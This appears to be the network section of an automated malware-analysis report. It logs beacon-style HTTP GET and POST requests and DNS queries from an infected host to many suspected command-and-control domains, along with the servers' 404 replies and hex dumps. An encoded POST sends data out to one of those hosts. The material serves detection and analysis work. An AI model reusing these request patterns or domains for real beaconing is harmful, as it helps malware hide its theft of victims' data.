                Source: global trafficHTTP traffic detected: GET /c2q3/?sn0PLN=j/0mpNm2Bsp7DIZ0lL93uSEy3O7+v2qbjKVTngZW+fxoFlp5b+1ximLQJstL0djCplBlCo8niZKHcOIqzu0BFGSn0M5MS0dRMByh0HJ4/jaoTuMehM4oDS0=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.7wkto5nk230724z.clickConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /w5is/?xZa=jpgDOVH8PXW8oBA0&sn0PLN=HbCgM9YcBMttwdZrXhLlY5z1HFkNRQK7DIvCaf9ftWyGunbQ91oOdhxta7T/vCia7UhAH45R/qaSwn7axWhs9/xB9a8/qr3Kz4jMxTKXhFTKb3+4TwbOFdg= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.roopiedutech.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /mgme/?sn0PLN=3lL/hypx1hmyWKcZLPPjI3y0DWzdh1Mqom9U/1xhTPLquFXOEtCOjeGYhH0PH+auVNiYKnzM9W/uk3mi7YblJuOSg3EBIys+/hhk110xaMRzC++YecO4bSA=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.suree.betConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /4q66/?sn0PLN=luPP4oyA+IxXa4dPaQ44uTX+yoj5Av033QMPVNIFYKC2UntJdFHOXwWAX/7zhXjIXLYqvWecISwtUHhz1+aJwbK46q/K1DU8OrPrV+gFHYeA3Gw8r5+flHs=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.bocadolobopetra.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /wh1i/?sn0PLN=NfOB86VXI4wsVz/XO9ACyDnBWrbPRq/QJ2w3Rs+6xYlcxVFOr5mbmHJ2iOb+4RiHynZrudFNXkx38yGLhxQe11Zee6oqKWgky3dD2swdesJmFdrAGLP7kwM=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.44kdd.topConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /qgza/?sn0PLN=qUfac4sEgcT1lV7He6HHqRuPwSXpeUZhJqCALOrqisMgJsMY6XUJFSDaK0uTR8zfEfRb7N0j/DnowCq79bdHl1fL6DN9OJHq4gCFNVkq5WVy1qGx7uu1RVo=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.dbasky.netConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /icpx/?sn0PLN=EWEf4eOOpXzvErl7RdF5qy2I3vzfoFn6qWFMKyXoxLDqmpyGz4laiprjdpsB5hfyQE5UJ9beIy4J0yBeSjcOCjXGgmEr9dkECjGb/w9fv9zko2b6bEiJ13U=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.zoptra.infoConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /uhg3/?sn0PLN=BYkW8sJ9y3cOHNEoRxCwA5Vo4ahPFjBVLPr9x2y6ZT42IcqGpiutRD9HR4qSfel6nhfbupoEu3BM2yJdNDd6onHQNeQ4qPh2tk8usD30jryO8epkJ7XZGNI=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nutrigenfit.onlineConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /pjcb/?sn0PLN=mR41NwlPpWSeNv3ogRNiaiaxYZXyC1SkAJjbD/qSc2ukVSLu6jyn16P/AoWnmXjc847+20hqOz4nW3sR+UY1qAEpIZA0h6plj49hN8QYEBC/SES4lZybD8k=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.redex.funConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /51fd/?sn0PLN=5XThc+sTNfSc1dyVCHius6QJlgyE7UD3g9QPrW9D0ZCA6InRQfgmSS7sY3ZsEANqCFm0SxAy1XScT67z0IieRfxf0Cr6BzHBArQcGKRuou4FU1nhplefNR0=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.broork.sbsConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /t7p4/?xZa=jpgDOVH8PXW8oBA0&sn0PLN=l9a7eDheKRZy9bhcTeCHdToYa6mt3ij4C0pbULzToM8sx4gmKc4u2ZHXAvhfaYH7/T0zUvL9+kkqYwdWGnSBKq2rvPWRIuzqlymkkYj2zkimPtA3jZhNuM4= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.deepfy.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficHTTP traffic detected: GET /6byd/?sn0PLN=cJlBP4gdQg33LxRaxIBB9TpDVwunrRcR6TPzX8fihpDKfN+C3z32iLCDUP2OAgtSF65Fjxsz3xegGgg43kjMMLGB+pU0EQVXDohFVmD6n/q0/xsVCvDFB+8=&xZa=jpgDOVH8PXW8oBA0 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.cmdh1c.xyzConnection: closeUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                Source: global trafficDNS traffic detected: DNS query: www.litsgs.vip
                Source: global trafficDNS traffic detected: DNS query: www.7wkto5nk230724z.click
                Source: global trafficDNS traffic detected: DNS query: www.roopiedutech.online
                Source: global trafficDNS traffic detected: DNS query: www.abistra.store
                Source: global trafficDNS traffic detected: DNS query: www.suree.bet
                Source: global trafficDNS traffic detected: DNS query: www.bocadolobopetra.net
                Source: global trafficDNS traffic detected: DNS query: www.44kdd.top
                Source: global trafficDNS traffic detected: DNS query: www.dbasky.net
                Source: global trafficDNS traffic detected: DNS query: www.zoptra.info
                Source: global trafficDNS traffic detected: DNS query: www.nutrigenfit.online
                Source: global trafficDNS traffic detected: DNS query: www.redex.fun
                Source: global trafficDNS traffic detected: DNS query: www.broork.sbs
                Source: global trafficDNS traffic detected: DNS query: www.deepfy.xyz
                Source: global trafficDNS traffic detected: DNS query: www.cmdh1c.xyz
                Source: unknownHTTP traffic detected: POST /c2q3/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-USHost: www.7wkto5nk230724z.clickOrigin: http://www.7wkto5nk230724z.clickReferer: http://www.7wkto5nk230724z.click/c2q3/Content-Length: 203Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30Data Raw: 73 6e 30 50 4c 4e 3d 75 39 63 47 71 39 4f 79 46 70 64 31 46 59 56 5a 74 59 59 4e 6d 51 77 4a 6d 35 6a 73 6a 7a 75 67 79 4c 4a 66 6b 6b 42 50 79 50 73 63 43 57 31 74 55 6f 31 74 73 53 50 52 4f 59 64 52 2f 63 47 61 77 77 78 5a 4f 37 59 51 74 62 2b 73 52 37 31 52 31 5a 35 78 64 30 4c 36 68 74 59 6a 58 41 30 57 42 57 43 73 77 33 77 74 79 6d 61 6b 66 76 73 7a 30 75 6b 67 55 41 73 6f 4f 75 6a 4c 57 44 71 31 45 68 46 71 7a 79 6a 4d 4d 44 72 74 76 52 73 74 58 6d 6f 2b 57 41 42 4b 55 72 4e 34 6e 57 4c 35 31 50 51 4b 6a 67 67 33 51 61 34 4c 6c 42 64 71 6b 68 70 57 45 67 53 53 33 44 77 41 66 39 43 79 2b 67 3d 3d Data Ascii: sn0PLN=u9cGq9OyFpd1FYVZtYYNmQwJm5jsjzugyLJfkkBPyPscCW1tUo1tsSPROYdR/cGawwxZO7YQtb+sR71R1Z5xd0L6htYjXA0WBWCsw3wtymakfvsz0ukgUAsoOujLWDq1EhFqzyjMMDrtvRstXmo+WABKUrN4nWL51PQKjgg3Qa4LlBdqkhpWEgSS3DwAf9Cy+g==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:18:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6qwz%2F9cMho692HHhfSsYXNYedg5oMgLa6LGMSoRh%2BGZPzwY8fJEjexmpmjQFVeKGq3AcIDUAit2DjHuM1w3Uko3Zj0%2FeSV2YVIy0dM33dOwEVL2XciBb1VeojOGNnGpNEBdWmDZXlU5QG5SX"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dba73d3aa426bd2-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1131&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=811&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:18:11 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EdwCCaDy487UPnK0%2BGuRiSu6SDyj8p7yfiZVef6pMZRhenlKR%2BYs70%2B6O73FMIBG71Qlbg4sjiMqIrdRPG%2FrZD%2BSNUHoQg5%2FH6D05STBYE0ZZDmy8Rk0TIumR2phO8BKBWrdfy5WtZ0us2XL"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dba73e389eb461a-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1728&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=831&delivery_rate=0&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a Data Ascii: f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:18:13 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8RA%2FLffMnzwoLayDK0zaK%2F7WsIs%2F0tR3hjjKdxMjZLumfZAZa2tnPYmRysmVBIEceFE%2Fqd1Y2zf6GHzfdx32LFXUHcTHQLOTkirnuFvpgjcr0HzbHbRuVVTTyTOxl2dfd%2FxTW2PIgYTd3cop"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dba73f37ef86bc2-DFWContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=944&sent=5&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10913&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:18:16 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=C0W6XyshX0KiHwYowSrAyRyzeAHishgVefMvUPUNVT9GX7Vr9iceEMCflrliOG8oJIB3O23QUgWPTMBYjoM7j%2FOaUpM8AAP3ikPz6O8nLBHYB4Wdbl1geA1Bv47Wa9CW3ze7w23CMkF%2B4QYr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8dba7403992a2e78-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1328&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=538&delivery_rate=0&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 08:19:16 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9c88-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 08:19:19 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9c88-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 08:19:22 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9c88-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 08:19:24 GMTContent-Type: text/htmlContent-Length: 148Connection: closeETag: "66df9c88-94"Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 08:19:32 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 08:19:34 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 08:19:37 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 01 Nov 2024 08:19:40 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:19:45 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 01 Nov 2024 08:19:48 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 